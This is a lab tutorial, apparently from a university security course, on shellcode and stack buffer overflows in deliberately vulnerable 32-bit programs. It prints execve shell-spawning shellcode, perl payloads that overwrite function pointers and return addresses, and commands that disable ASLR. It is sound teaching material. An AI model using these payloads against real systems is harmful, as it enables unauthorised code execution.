Place the string on the stack as done before. It is cumbersome to do that by hand, so use the ''-e'' formatting option for ''hexdump''. For example, to create the assembly code for placing the "Hello, World!\n" string on the stack one would issue the command
$ echo -en 'Hello, World!\n' | hexdump -v -e '1/4 "push 0x%08x\n"' | tac
push 0x00000a21
push 0x646c726f
push 0x57202c6f
push 0x6c6c6548
Adapt the above command, get the assembly code for placing "Hello, Romania!\n" on the stack and then update the shellcode, obtain the byte string, place it into the ''vuln.c'' file, compile the file, run the executable and ... profit! :-)
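A Python counterpart of the ''hexdump'' pipeline shown above may be easier to adapt. This is a minimal sketch, assuming Python 3; ''string_to_pushes'' is an illustrative name. It pads the string with NUL bytes to a multiple of four, reads it as little-endian 32-bit words and emits the words in reverse order, since the last ''push'' must hold the start of the string.

```python
import struct

def string_to_pushes(data):
    """Return the push instructions that place data on the stack."""
    padded = data + b"\x00" * (-len(data) % 4)
    words = struct.unpack("<%dI" % (len(padded) // 4), padded)
    return ["push 0x%08x" % word for word in reversed(words)]

for line in string_to_pushes(b"Hello, World!\n"):
    print(line)
```

For the "Hello, World!\n" input this prints the same four ''push'' lines as the ''hexdump'' command.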
== Use execve shellcode ==
As the name implies, a shellcode is usually used for getting a shell. This type of shellcode typically ends in the ''execve'' system call. Let's try this using the shellcode from [[http://shell-storm.org/shellcode/files/shellcode-827.php|here]]. We've already made sure that the byte string is valid and ends up invoking the ''0xb'' (number ''11'') system call (i.e. ''execve'').
We update the ''shellcode'' variable in ''vuln.c'' using this byte string shellcode:
$ cat vuln.c
[...]
static const char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89"
"\xe1\xb0\x0b\xcd\x80";
[...]
Now we compile the ''vuln.c'' program
$ make
cc -m32 -Wall -g -c -o vuln.o vuln.c
cc -m32 -zexecstack vuln.o -o vuln
and then we run it
$ ./vuln
$
We can exit the new shell by running ''exit'' or by using the ''Ctrl+d'' keyboard combo.
After running the executable you get a new shell so our shellcode was successful. We can see that by running the executable under ''strace'' and looking for the ''execve'' call:
$ strace ./vuln
[...]
execve("/bin//sh", ["/bin//sh"], [/* 1 var */]) = 0
[...]
The shellcode was successful and we managed to obtain a new shell.
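The ''/bin//sh'' path reported by ''strace'' can also be recovered from the byte string itself, because the shellcode builds it on the stack with two ''push'' instructions. The sketch below assumes Python 3 and is deliberately naive: it treats every ''0x68'' byte found at a scanning position as a ''push imm32'' opcode, which happens to work for this shellcode but is not a substitute for a disassembler. The name ''pushed_immediates'' is made up for illustration.

```python
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68"
             b"\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89"
             b"\xe1\xb0\x0b\xcd\x80")

def pushed_immediates(code):
    """Naively collect the 4-byte operands of 'push imm32' (opcode 0x68)."""
    operands, i = [], 0
    while i < len(code):
        if code[i] == 0x68 and i + 5 <= len(code):
            operands.append(code[i + 1:i + 5])
            i += 5  # skip the opcode and its operand
        else:
            i += 1
    return operands

# The last value pushed sits at the lowest address, so reverse the order.
path = b"".join(reversed(pushed_immediates(SHELLCODE)))
print(path)  # b'/bin//sh'
```

The doubled slash pads the path to eight bytes so that it fits exactly in two 32-bit pushes.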
=== Task: Update the execve shellcode to work properly ===
In the ''bad-execve-shellcode/'' subfolder in the tasks archive you can find a version of the ''vuln.c'' program that uses the execve-based shellcode from above, except that there are some random integer operations in there. If you compile and run the program you get a //Segmentation fault// error:
$ make
cc -m32 -Wall -g -c -o vuln.o vuln.c
cc -m32 -zexecstack vuln.o -o vuln
$ ./vuln
Segmentation fault
The cause of the error is a problem with the shellcode. The shellcode works on certain setups but not all of them due to a negligence of the shellcode author.
The problem is with the ''execve'' system call.
You can use ''strace'' to see the parameters of the ''execve'' system call when running ''./vuln''. That will offer you a hint on why the ''execve'' system call has failed.
Disassemble the shellcode, find out what is wrong with it, then fix it inside the ''vuln.c'' source file so that you eventually get a shell.
== Use program argument to overwrite local function pointer ==
In the ''vuln.c'' program we used so far, we initialize the ''func_ptr'' function pointer with the "suitable" shellcode address. This is the triggering phase for the shellcode-based attack but that's far from common in programs. What is usually the case is that a buffer is overflowed to overwrite a suitable address.
In the ''overflow-task-and-shellcode/'' subfolder there is a ''vuln.c'' source code file. In the file we use ''strcpy()'' to copy the first program argument (''argv[1]'') into a local buffer variable named ''buffer''. If we give a string longer than the buffer length (''32'') we cause a buffer overflow and are able to overwrite the ''func_ptr'' function pointer located just above the buffer. The ''vuln.c'' file is using a proper NUL-free, always-works shellcode that spawns a shell.
Our goal is to provide the proper command line argument in order to overflow the ''buffer'' variable and overwrite the ''func_ptr'' function pointer with the address of the ''shellcode'' variable storing the byte string shellcode.
First of all let's see how the program behaves:
$ make
cc -m32 -Wall -fno-stack-protector -g -c -o vuln.o vuln.c
cc -m32 -zexecstack vuln.o -o vuln
$ ./vuln
Usage: ./vuln string
$ ./vuln aaa
Do nothing, successfully!
For a short string the program performs OK and the ''do_nothing_successfully'' function stored in the ''func_ptr'' local variable is invoked.
When compiling we are now using the ''-fno-stack-protector'' option to disable the stack protection mechanism (also dubbed //stack canary//). We'll discuss more on that in the next sessions.
Let's now see what happens if we overflow the buffer. We write a lot more bytes than the buffer length (let's say ''50'' bytes) and we check what happens. In order to generate 50 bytes we use ''perl'':
$ perl -e 'print "A"x50'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
In order to feed that input as a program argument to ''vuln'' we use [[http://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html|shell command substitution]]:
$ ./vuln $(perl -e 'print "A"x50')
Segmentation fault
We see that now the program is sent a ''SIGSEGV'' signal. Most probably this is due to the ''func_ptr'' function pointer being overwritten. We check that using ''dmesg'':
$ dmesg
[...]
[38217.667318] vuln[11474]: segfault at 41414141 ip 0000000041414141 sp 00000000ff9475ec error 14
As shown in the ''dmesg'' output the program failed when ''eip'' is ''0x41414141'' (which is the ''AAAA'' string) meaning the ''func_ptr'' local variable was overwritten.
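When the same check has to be repeated many times, the fields of the ''dmesg'' line can be extracted programmatically. The Python sketch below assumes the line has the same layout as the one shown above; the regular expression and the ''parse_segfault'' helper are our own and are not part of any tool.

```python
import re

# Assumption: the kernel message has the same layout as the line shown above.
SEGFAULT_RE = re.compile(
    r"(?P<name>\S+)\[(?P<pid>\d+)\]: segfault at (?P<addr>[0-9a-f]+) "
    r"ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) error (?P<error>\S+)"
)

SAMPLE = ("[38217.667318] vuln[11474]: segfault at 41414141 "
          "ip 0000000041414141 sp 00000000ff9475ec error 14")


def parse_segfault(line):
    """Return the fields of a segfault line as a dict, or None if no match."""
    match = SEGFAULT_RE.search(line)
    if match is None:
        return None
    return {
        "name": match.group("name"),
        "pid": int(match.group("pid")),
        "addr": int(match.group("addr"), 16),   # faulting address
        "ip": int(match.group("ip"), 16),       # instruction pointer
        "sp": int(match.group("sp"), 16),       # stack pointer
        "error": match.group("error"),          # kept as raw text
    }


if __name__ == "__main__":
    info = parse_segfault(SAMPLE)
    # Show the instruction pointer as the bytes that were written over func_ptr.
    print(hex(info["ip"]), info["ip"].to_bytes(4, "little"))
```

Converting the instruction pointer back to bytes makes it easy to recognize which part of the input ended up in ''func_ptr''.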
We can also check that using GDB:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ set args $(perl -e 'print "A"x50')
gdb-peda$ start
[...]
gdb-peda$ disass
Dump of assembler code for function main:
[...]
0x08048517 <+84>: push eax
0x08048518 <+85>: call 0x8048350
0x0804851d <+90>: add esp,0x10
[...]
gdb-peda$ b *0x08048518
Breakpoint 2 at 0x8048518: file vuln.c, line 22.
gdb-peda$ b *0x0804851d
Breakpoint 3 at 0x804851d: file vuln.c, line 22.
gdb-peda$ continue
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
EBX: 0xf7f9d000 --> 0x1a5da8
ECX: 0xffffd2f0 --> 0x2
EDX: 0xffffd314 --> 0xf7f9d000 --> 0x1a5da8
ESI: 0x0
EDI: 0x0
EBP: 0xffffd2d8 --> 0x0
ESP: 0xffffd290 --> 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
EIP: 0x8048518 (: call 0x8048350 )
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048513 : push eax
0x8048514 : lea eax,[ebp-0x2c]
0x8048517 : push eax
=> 0x8048518 : call 0x8048350
0x804851d : add esp,0x10
0x8048520 : mov eax,DWORD PTR [ebp-0xc]
0x8048523 : call eax
0x8048525 : mov eax,0x0
Guessed arguments:
arg[0]: 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
arg[1]: 0xffffd550 ('A' )
[------------------------------------stack-------------------------------------]
0000| 0xffffd290 --> 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
0004| 0xffffd294 --> 0xffffd550 ('A' )
0008| 0xffffd298 --> 0xf7e03bf8 --> 0x2aa0
0012| 0xffffd29c --> 0xf7e281e3 (add ebx,0x174e1d)
0016| 0xffffd2a0 --> 0x0
0020| 0xffffd2a4 --> 0xca0000
0024| 0xffffd2a8 --> 0x1
0028| 0xffffd2ac --> 0x8048321 (<_init+9>: add ebx,0x14f3)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 2, 0x08048518 in main (argc=0x2, argv=0xffffd384) at vuln.c:22
22 strcpy(buffer, argv[1]);
gdb-peda$ x/32b buffer
0xffffd2ac: 0x21 0x83 0x04 0x08 0xeb 0xd4 0xff 0xff
0xffffd2b4: 0x2f 0x00 0x00 0x00 0x14 0x98 0x04 0x08
0xffffd2bc: 0x92 0x85 0x04 0x08 0x02 0x00 0x00 0x00
0xffffd2c4: 0x84 0xd3 0xff 0xff 0x90 0xd3 0xff 0xff
gdb-peda$ continue
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd2ac ('A' )
EBX: 0xf7f9d000 --> 0x1a5da8
ECX: 0xffffd580 --> 0x58004141 ('AA')
EDX: 0xffffd2dc --> 0xf7004141
ESI: 0x0
EDI: 0x0
EBP: 0xffffd2d8 ("AAAAAA")
ESP: 0xffffd290 --> 0xffffd2ac ('A' )
EIP: 0x804851d (: add esp,0x10)
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048514 : lea eax,[ebp-0x2c]
0x8048517 : push eax
0x8048518 : call 0x8048350
=> 0x804851d : add esp,0x10
0x8048520 : mov eax,DWORD PTR [ebp-0xc]
0x8048523 : call eax
0x8048525 : mov eax,0x0
0x804852a : mov ecx,DWORD PTR [ebp-0x4]
[------------------------------------stack-------------------------------------]
0000| 0xffffd290 --> 0xffffd2ac ('A' )
0004| 0xffffd294 --> 0xffffd550 ('A' )
0008| 0xffffd298 --> 0xf7e03bf8 --> 0x2aa0
0012| 0xffffd29c --> 0xf7e281e3 (add ebx,0x174e1d)
0016| 0xffffd2a0 --> 0x0
0020| 0xffffd2a4 --> 0xca0000
0024| 0xffffd2a8 --> 0x1
0028| 0xffffd2ac ('A' )
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 3, 0x0804851d in main (
argc=,
argc@entry=,
argv=,
argv@entry=) at vuln.c:22
22 strcpy(buffer, argv[1]);
gdb-peda$ x/32b buffer
0xffffd2ac: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffd2b4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffd2bc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffd2c4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
gdb-peda$ continue
Continuing.
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x41414141 ('AAAA')
EBX: 0xf7f9d000 --> 0x1a5da8
ECX: 0xffffd580 --> 0x58004141 ('AA')
EDX: 0xffffd2dc --> 0xf7004141
ESI: 0x0
EDI: 0x0
EBP: 0xffffd2d8 ("AAAAAA")
ESP: 0xffffd29c --> 0x8048525 (: mov eax,0x0)
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xffffd29c --> 0x8048525 (: mov eax,0x0)
0004| 0xffffd2a0 --> 0x0
0008| 0xffffd2a4 --> 0xca0000
0012| 0xffffd2a8 --> 0x1
0016| 0xffffd2ac ('A' )
0020| 0xffffd2b0 ('A' )
0024| 0xffffd2b4 ('A' )
0028| 0xffffd2b8 ('A' )
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()
gdb-peda$
In the above GDB output we've used breakpoints to break right before and right after the call to ''strcpy()''. We see that the 32 bytes starting at the buffer address (printed using ''x/32b buffer'') hold leftover stack data before ''strcpy()'' and are filled with ''A'' (''0x41'') afterward. From the GDB output we now know we overflow the buffer and also the ''func_ptr'' function pointer. We know we overwrite quite a bunch of stuff since we also overwrite the ''main()'' function arguments:
argc=,
argc@entry=,
argv=,
argv@entry=) at vuln.c:22
Of course, our aim is to craft the overflow carefully so that ''func_ptr'' is overwritten with exactly the value we want, that is the address of the ''shellcode'' global variable. In order to do that we need to know precisely where ''func_ptr'' is located with respect to ''buffer''. Let's assume that difference is ''d'' (''d = &func_ptr - &buffer''). Our goal is to write ''d'' bytes into the buffer, followed by the address of the ''shellcode'' variable. So we will provide a string of ''d+4'' length as the program argument.
Our steps for this to happen are:
- Find out the difference between ''func_ptr'' and ''buffer''. Let's call it ''d''.
- Find out the hexadecimal address of ''shellcode''.
- Create a byte string of ''d+4'' bytes consisting of ''d'' bytes of ''A'' (just a padding) and then the 4 bytes for the address of ''shellcode''.
In order to compute the difference between ''func_ptr'' and ''buffer'' we need to use dynamic analysis (GDB) as the two variables are stored on the stack:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ start
[...]
gdb-peda$ p &func_ptr
$1 = (void (**)(void)) 0xffffd2fc
gdb-peda$ p &buffer
$2 = (char (*)[32]) 0xffffd2dc
In the run above, the two variables are located at ''0xffffd2fc'' and ''0xffffd2dc''. The addresses may be different on another run. The difference is ''0x20'', meaning ''32'':
$ python -c 'print(0xffffd2fc-0xffffd2dc)'
32
Most of the time the system would have ASLR (//Address Space Layout Randomization//) enabled. This means that different runs of the same program would result in different placing of the stack and the addresses for the two variables (''func_ptr'' and ''buffer'') will differ. However the difference between the two addresses stays the same.
A difference of ''32'' was expected since the buffer stores 32 characters. However, this needn't always be the case and you need to confirm it through (dynamic) analysis, such as the one we did with GDB.
So, ''d'' (the difference) is ''32''.
To find out the address of the ''shellcode'' variable we use static analysis, since the variable is global and stored in the ''.rodata'' section of the executable. We use ''nm'' for that:
$ nm vuln | grep shellcode
080485d0 r shellcode
So the address of ''shellcode'' that we aim to use to overwrite the ''func_ptr'' function pointer is ''0x080485d0''.
The address of the ''shellcode'' variable may differ from ''0x080485d0'' if the executable was obtained on another system with another compiler.
We now construct the ''d+4'' (''32+4=36'') byte string to feed as the first program argument. We use ''perl'' for that:
$ perl -e 'print "A"x32,"\xd0\x85\x04\x08"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAЅ
....
$ perl -e 'print "A"x32,"\xd0\x85\x04\x08"' | od -t x4
0000000 41414141 41414141 41414141 41414141
*
0000040 080485d0
We see that we are generating the proper byte string, filling the buffer with ''A'' characters and then using the 4 byte address of ''shellcode'' (''\xd0\x85\x04\x08'') to overwrite the ''func_ptr''.
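The same byte string can be built in Python, which makes the little-endian encoding of the address explicit. This is a minimal sketch: ''build_overflow_arg'' is a name we made up, and the offset (''32'') and address (''0x080485d0'') are the values from the run above, which may differ on your system.

```python
import struct


def build_overflow_arg(offset, target_addr, filler=b"A"):
    """Return `offset` filler bytes followed by a 32-bit little-endian address."""
    payload = filler * offset + struct.pack("<I", target_addr)
    # A program argument is a NUL-terminated string, so a NUL byte would cut it.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte")
    return payload


if __name__ == "__main__":
    # Values taken from the GDB and nm output above (assumed for this sketch).
    payload = build_overflow_arg(32, 0x080485d0)
    print(len(payload), payload.hex())
```

The ''"<I"'' format asks ''struct.pack'' for an unsigned 32-bit integer in little-endian order, which yields the same ''\xd0\x85\x04\x08'' sequence we typed by hand in the ''perl'' command.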
Let's pass that string as the first argument using shell command substitution and profit:
$ ./vuln $(perl -e 'print "A"x32,"\xd0\x85\x04\x08"')
$
Excellent, we've got a shell! We've now got closer to what an attack really looks like: the trigger step happens with the help of a buffer overflow caused by the ''strcpy()'' function.
=== Task: Overwrite the function return address ===
Let's now get to the next step towards making the attack more realistic. We would rarely have the benefit of a function pointer (such as ''func_ptr'') being conveniently placed after a buffer in memory. What we usually aim to do is overwrite the function return address, point that to the shellcode (in our case the ''shellcode'' variable) and profit!
Inside the ''overwrite-return-address/'' subfolder in the tasks archive you will find a vulnerable source code file (''vuln.c''). This file has a buffer overflow vulnerability through the call of ''strcpy()'' inside the ''do_nothing_successfully()'' function.
Exploit this vulnerability by causing a buffer overflow of the ''buffer'' variable and overwriting the return address of the ''do_nothing_successfully()'' function to point to the shellcode (i.e. the address of the ''shellcode'' variable).
You need to find out the difference between the address where the function return address is stored and the address of the ''buffer'' variable. You also need the address of the ''shellcode'' variable, which is the value to write there.
Use the ''$ebp+4'' construct in GDB to find out the address where the function return address is stored.
== Task: Use standard input to provide data ==
Passing information as a program argument is one of the ways to provide input to the vulnerable program. Another way is through standard input. Let's use standard input to cause a buffer overflow and run the shellcode (again inside the ''shellcode'' variable).
Inside the ''use-standard-input/'' subfolder in the tasks archive you will find a vulnerable source code file (''vuln.c'') with a similar vulnerability to the one above: the use of ''strcpy()'' to cause a buffer overflow inside the ''do_nothing_successfully()'' function. There are several differences:
* the initial data is now read from standard input using ''fgets()''
* the buffer we are going to overwrite is now 70 characters long
* we've added an extra local variable before the buffer to make it a bit more challenging to determine the return address
Similarly to the task above, exploit the vulnerability by causing a buffer overflow of the ''buffer'' variable and overwriting the return address of the ''do_nothing_successfully()'' function to point to the shellcode (i.e. the address of the ''shellcode'' variable).
First determine the difference between the buffer start address and the address where the return address is stored (both in the stack frame of ''do_nothing_successfully()''). GDB is probably the best way to do that.
Find out the address of the ''shellcode'' variable in the ''vuln'' executable. ''nm'' should be the simplest way to do that.
Create a payload to feed to the program consisting of ''d'' (the difference) bytes of ''A'' and then the address of the ''shellcode'' variable. Bear in mind we are using a little endian architecture.
To feed input to the program you may use something like
perl -e 'print "A"x50...' | ./vuln
However, this doesn't work. Even if the shellcode executes and a shell is created, the pipe is closed once ''perl'' exits, so the standard input of the shell is closed as well. You can still check whether the shellcode runs by using ''strace''.
The proper way to do this is with a command such as
cat <(perl -e 'print "A"x50...') - | ./vuln
The above command "concatenates" the output of the ''perl'' command with standard input (''-''). After the output of the ''perl'' command is fed to the ''vuln'' program and a shell is created, the ''perl'' process exits, but the ''vuln'' program continues to receive data from standard input.
If everything works, you will not get the usual prompt (''$''), but any command you provide on standard input will be run by the shell.
=== Task: Fill global variable with the shellcode ===
Now that we know how to cause a buffer overflow and trigger the execution of the shellcode, let's make another step into making things more realistic by injecting the shellcode into the program. Up until now the shellcode was conveniently stored in the ''shellcode'' variable, which is fairly unrealistic.
Inside the ''fill-global-variable/'' subfolder in the tasks archive we have the ''vuln.c'' program that we want to exploit. Our aim is to inject and store the shellcode in the ''resident_data'' global variable. The attack payload (consisting of the ''A'' byte padding and the address of the ''resident_data'' variable) will be stored in the ''input_buffer'' variable and then in the ''buffer'' variable. Both the shellcode and the attack payload are provided through standard input.
Similarly to the task above, exploit the vulnerability by injecting the shellcode through standard input into the ''resident_data'' global variable, causing a buffer overflow of the ''buffer'' variable and overwriting the return address of the ''do_nothing_successfully()'' function to point to the shellcode (i.e. the address of the ''resident_data'' global variable).
Use the hints and start from the solution from the task above.
Use the shellcode that was stored in the ''shellcode'' variable in the above tasks. You may use ''echo'', ''python'' or ''perl'' to print it. It may be of help to store the shellcode in a file and feed input from that file.
When feeding the shellcode through standard input to the ''resident_data'' global variable, end it with a newline (''\n''). ''fgets()'' needs a newline to complete.
== Use the stack buffer for storing the shellcode ==
In the above task we were in luck that we had two buffers and both were filled by feeding input to the vulnerable program (in our case, through standard input). But that's not usually the case. Let's consider the situation where the ''resident_data'' buffer is not part of our program. Could an attack be possible? Yes, of course: we can use the ''input_buffer'' variable both for storing the shellcode and the payload for causing the buffer overflow. This data will then be copied to the ''buffer'' variable and we'll profit!
In the ''shellcode-in-stack-buffer/'' subfolder in the tasks archive the ''vuln.c'' program has the ''strcpy()''-based vulnerability identical to the above tasks but no "helper" buffer. We'll have to use the ''buffer'' variable both for storing the shellcode and the payload for causing the buffer overflow.
In short, we'll have to get to a situation where we overwrite the return address of ''do_nothing_successfully()'' function with the start address of the ''buffer'' variable, such that we'll execute code from the ''buffer'' variable. The contents of the ''buffer'' variable will start with the shellcode we've used so far. We'll feed that as input to the buffer.
The steps we are going to undertake are:
- Find out ''d'', the difference between the start of the buffer and the return address, to know how to trigger the buffer overflow. It should be identical to the one in the tasks above, but it's always good to be sure. We'll use GDB for this.
- Find out what is the address of the ''buffer'' variable on the stack. We'll use GDB for this as well.
- Create a payload that consists of the following:
- ''n'' bytes of shellcode (where ''n'' is the length of the shellcode)
- ''d-n'' bytes of ''A'' padding (where ''d'' is the above difference)
- ''4'' bytes storing the address of the buffer variable (on the stack)
- Store the payload in a file (we'll name it ''payload'') as it will be easier to inspect it afterwards.
- Feed the payload as standard input to the program using a construction such as
cat payload - | ./vuln
First of all, let's find out the difference between the address of the ''buffer'' variable and the address where the return address is stored in the ''do_nothing_successfully()'' function stack frame. We'll use GDB for that: we use a breakpoint to get to the point right before the ''strcpy()'' call (in the ''do_nothing_successfully()'' function) and then print the address of the ''buffer'' variable and the address where the return address is stored.
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ start
[...]
gdb-peda$ disass do_nothing_successfully
Dump of assembler code for function do_nothing_successfully:
0x0804847b <+0>: push ebp
0x0804847c <+1>: mov ebp,esp
0x0804847e <+3>: sub esp,0x58
0x08048481 <+6>: mov DWORD PTR [ebp-0xc],0x3
0x08048488 <+13>: sub esp,0x8
0x0804848b <+16>: push DWORD PTR [ebp+0x8]
0x0804848e <+19>: lea eax,[ebp-0x52]
0x08048491 <+22>: push eax
0x08048492 <+23>: call 0x8048350
0x08048497 <+28>: add esp,0x10
[...]
gdb-peda$ b *0x08048492
Breakpoint 2 at 0x8048492: file vuln.c, line 10.
gdb-peda$ continue
Continuing.
Provide input data: aaaa
[...]
Breakpoint 2, 0x08048492 in do_nothing_successfully (str=0xffffd280 "aaaa\n")
at vuln.c:10
10 strcpy(buffer, str);
gdb-peda$ p &buffer
$1 = (char (*)[70]) 0xffffd216
gdb-peda$ p $ebp+4
$2 = (void *) 0xffffd26c
gdb-peda$
In GDB we've printed the address of the local buffer variable and the address where the return address is stored (''$ebp+4''). These addresses may be different on your system. We'll compute the difference using Python:
$ python -c 'print(0xffffd26c-0xffffd216)'
86
As before, the difference is ''86'' bytes. We need to create a payload of ''86+4'' bytes to overwrite the return address in the ''do_nothing_successfully()'' stack frame.
We already found out the address of the buffer variable as well: ''0xffffd216''. So we're ready to create our payload. As stated above the payload will consist of:
- ''n'' bytes of shellcode (where ''n'' is the length of the shellcode)
- ''d-n'' bytes of ''A'' padding (where ''d'' is the above difference)
- ''4'' bytes storing the address of the ''buffer'' variable (on the stack)
Our shellcode is the one we've already used. Let's find out its length:
$ echo -en '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80' | wc -c
25
So our payload will consist of ''90'' bytes:
- ''25'' bytes of shellcode
- ''86-25 = 61'' bytes of ''A'' padding
- ''4'' bytes storing the address of the ''buffer'' variable (''\x16\xd2\xff\xff'')
Let's create the payload and store it in a file named ''payload'':
$ perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","A"x61,"\x16\xd2\xff\xff\n"' > payload
$ wc -c payload
91 payload
$ xxd payload
00000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e350 1.Ph//shh/bin..P
00000010: 5389 e131 d2b0 0bcd 8041 4141 4141 4141 S..1.....AAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000030: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000040: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000050: 4141 4141 4141 16d2 ffff 0a AAAAAA.....
So the ''payload'' file now stores our payload and we can feed it to the vulnerable program.
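For comparison, here is a minimal Python sketch that assembles the same payload from its three parts. The function name ''build_stack_payload'' is ours, and the offset (''86'') and buffer address (''0xffffd216'') are the values from the GDB run above, so they are assumptions that may not hold on your system.

```python
import struct

# The 25-byte execve shellcode used above.
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")


def build_stack_payload(shellcode, offset, buffer_addr, filler=b"A"):
    """shellcode + padding up to `offset` + little-endian address + newline."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the return address")
    padding = filler * (offset - len(shellcode))
    body = shellcode + padding + struct.pack("<I", buffer_addr)
    # strcpy() stops at NUL and fgets() stops at newline, so neither byte
    # may appear before the final newline.
    if b"\x00" in body or b"\n" in body:
        raise ValueError("payload contains a NUL or newline byte")
    return body + b"\n"


if __name__ == "__main__":
    payload = build_stack_payload(SHELLCODE, 86, 0xffffd216)
    print(len(payload), payload.hex())
```

Writing the result with ''open("payload", "wb").write(payload)'' should produce the same 91-byte file as the ''perl'' command.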
We send the payload to the standard input of the ''vuln'' program:
$ cat payload - | ./vuln
ps
Segmentation fault
We get a segmentation fault, so something went wrong. Let's check what caused the error; maybe we didn't properly construct the payload and jumped to a different address:
$ dmesg
[...]
[144777.383326] vuln[15245]: segfault at ffffd216 ip 00000000ffffd216 sp 00000000ffb71620 error 14
Nope. The address where the segmentation fault occurred is the one we intended; it's the buffer address ''0xffffd216''.
Let's investigate in GDB what happens by feeding the same data to the standard input of the ''vuln'' program:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ run < payload
Starting program: [...]/shellcode-in-stack-buffer/vuln < payload
process 26482 is executing new program: /bin/dash
[...]
This is weird. The exploit works under GDB. There must be something different between the two environments: running in GDB and without GDB.
There are actually two aspects:
- ASLR (//Address Space Layout Randomization//) is disabled in GDB versions starting with 7. See [[https://outflux.net/blog/archives/2010/07/03/gdb-turns-off-aslr/|this link]] for more information.
- The environment is different and because of that the address itself may be different under GDB.
First of all we need to disable ASLR. We have two ways to do that:
- system-wide (administrative privileges are required):
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
- for a shell process only
$ linux32 -3 -R bash -l
If ASLR is enabled dynamic memory areas will be placed in different locations. We can use ''ldd'' to inspect the placing of library memory areas
$ ldd vuln
linux-gate.so.1 (0xf77a1000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf75bd000)
/lib/ld-linux.so.2 (0xf77a4000)
$ ldd vuln
linux-gate.so.1 (0xf76e4000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf7500000)
/lib/ld-linux.so.2 (0xf76e7000)
$ ldd vuln
linux-gate.so.1 (0xf77c9000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf75e5000)
/lib/ld-linux.so.2 (0xf77cc000)
In the above situation ASLR is enabled, as the load addresses of the libraries differ at each ''ldd'' run.
After we disable ASLR (using any of the above two methods), we can see that the addresses for library functions are identical for each ''ldd'' run:
$ ldd vuln
linux-gate.so.1 (0xb7ffd000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb7e19000)
/lib/ld-linux.so.2 (0x41000000)
$ ldd vuln
linux-gate.so.1 (0xb7ffd000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb7e19000)
/lib/ld-linux.so.2 (0x41000000)
$ ldd vuln
linux-gate.so.1 (0xb7ffd000)
libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb7e19000)
/lib/ld-linux.so.2 (0x41000000)
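The system-wide setting can also be read back from the same ''/proc'' file we wrote to. The Python sketch below maps the value to a short description; the helper names are ours, and the descriptions follow the kernel's documented meaning of ''0'', ''1'' and ''2'' for ''randomize_va_space''.

```python
ASLR_PATH = "/proc/sys/kernel/randomize_va_space"

ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and vDSO randomized",
    2: "as for 1, plus heap (brk) randomization",
}


def describe_aslr(raw_value):
    """Map the text read from randomize_va_space to a short description."""
    return ASLR_MODES.get(int(raw_value.strip()), "unknown value")


def read_aslr(path=ASLR_PATH):
    """Read the current system-wide setting (Linux only)."""
    with open(path) as handle:
        return describe_aslr(handle.read())


if __name__ == "__main__":
    try:
        print("ASLR:", read_aslr())
    except OSError:
        print("randomize_va_space is not available on this system")
```

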